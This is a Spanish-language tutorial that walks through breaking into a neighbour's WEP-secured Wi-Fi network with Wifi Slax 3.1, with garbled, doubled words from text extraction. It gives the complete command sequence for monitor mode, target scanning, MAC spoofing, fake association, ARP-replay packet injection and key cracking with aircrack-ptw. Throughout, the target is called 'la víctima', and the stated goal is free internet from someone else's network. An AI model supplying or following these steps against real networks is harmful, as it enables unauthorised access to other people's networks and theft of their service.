Nota: Las Comillas que se ponen aquí en el manual solo son para hacer especificaciones, pero no significan que las vamos a colocar durante el proceso que vayamos a ejecutar.
1
Lo primero que tenemos que hacer es saber que tipo de tarjeta estamos utilizando y para verificar que Wifi Slax 3.1 reconocer nuestra tarjeta de red. Abrimos una “Shell” y escribimos el siguiente com and o:
iwconfig Una vez puesto el comando nos debe aparecer unas características en las siguientes par tes: tes:
2 wifi0 th0 ath0 eth0 th0 Si nos aparece alguna característica en wifi0, en ath0 o en eth0 nos da a entender que nuestr a tarjeta de red inalámbrica es compatible con Wifi Slax 3.1 Tenemo Tenemoss que poder en modo modo monito monitorr nuestr nuestraa tarjet tarjeta, a, per o manualmente escribiendo el siguiente comando en una “Shell”
airmon-ng start ath th0 0 Y listo cerramos esa ve v entana.
PC R
3
Ahora para saber la MAC d e nuestra victima = BSSID y el canal, abriremos una ventana de “Modo Monit or”, Y para esto vamos a “Inicio------> Wifi Slax---> Asistencia de chipset -----> Asistencia de chipset Ather os -----> Modo monitor” le damos clic; una vez abierta esa ventana, escribimos el com and o: airodump-ng –w “Poner cualquier nombre” –c 1-1 1 ath0 Se escanearan redes en los 11 canales que existen; Wifi Slax nos va a detectar en que canal se encuentra la red que vamos a cracker y a la vez la BSSID que es lo mismo que la MAC pero de nuestra víctim a.
BSSID = MAC DE LA VI CTIMA CH = CHANEL o CANAL DE LA RED DE LA VICTIMA (Importante)
4
Una vez obtenida la BSSID y el CANAL, anotamos eso en una hoja, paramos el proceso con las teclas CTRL + C y ahora apagamos la interfaz en esta misma “Shell” con el siguiente com and o: ifconfig ath0 down
5
Procederemos a cambiar la MAC Verdadera que trae predet erminada nuestra tarjeta de red inalámbrica por una MAC FALSA y lo hacemos en esta misma “Shell” poniendo el siguiente com and o:
macchanger -m 00:11:22:33:44:55 ath0 Auto máticame nte la interfaz se encenderá a la hora de cambiar nue str a MAC .
PC R
6
Ahora crearemos un archivo en donde se guardaran los paquetes capturados, abrimos una “Shell” y escribimos el siguiente com and o:
airodump-ng –w “Poner un nombre diferente al Modem” –c x (donde “x” es el canal de la victima) -- bssid (Seguido de la BSSID o MAC de la victima) ath0 El nombre diferente del modem es necesario anotarlo en una hoja porque lo utilizaremos en el paso Número
9 por que va a ser el
archivo en donde se almacenaran los paquetes ca ptur ados.
7
Para asociarnos a la red utilizaremos el comando “aireplay-ng”, así que procedemos a a brir una “Shell” y sin cerrar ninguna ventana anterior nos asociaremos con el siguiente com and o: aireplay-ng -1 0 -e “Nombre del modem o de la red” -a “La BSSID o MAC DE LA VICTIMA” –h 00:11:22:33:44:55 ath0
Donde:
-1= Tipo de ataque -e= Es el modificador que indica el nombre del MODEM -a= de adares y es la MAC de la victima -h= de hide y es la dirección oculta o MAC FALSA Nos saldrá una carita Feliz :-) y eso indicara que la asociación a sido un éxito.
PC R
8
Capturaremos paquetes en esta misma “Shell” siguiente com and o:
utilizando el
aireplay-ng -3 -b “MAC o BSSID de la víctima” –h 00:11:22:33:44:55 ath0
Donde:
-3 = Tipo de ataque de inyección. -b = BSSID o verdadera MAC de la Victima. -h = De “hide” que es la MAC FALSA. “Cuando tengamos aproximadamente paquetes recibidos crackearemos la red”
9
25,000
Ahora crackearemos la red para encontrar la clave de diez dígitos y para esto abrimos una “Shell” y sin cerrar ninguna de las ventanas anteriores escribiremos el siguiente c oman do:
aircrack-ptw “nombre del archivo que pusimos en paso Nº 6” seguido de -01.cap
Ejem plo: aircrack-ptw redvecino-01.cap
PC R
Nos saldrá un cuadro con el siguiente texto: Buscando Nueva Ta bla
BSSID (Aparecerá la MAC verdadera de nuestra victima =BSSID) Estadística para BSSID (Aparece otr a ves la MAC de la victima) Keindex=0 Paquete (Muestra los paquetes ca pturados) Clave encontrada con longitud 05: (Nos aparecerá una clave de 10 Números o Números con letras y esa es la CLAVE DEL MOD EM) Paramos los procesos que tenemos abiertos con CTRL + C y cerramos esas ventana s. Salimos del Wifi Slax 3.1 y reiniciamos la com putadora. Cuando estemos buscando la red crackeada escribimos la contraseña en donde no las pide y eso es todo INTERNET GRATI S.
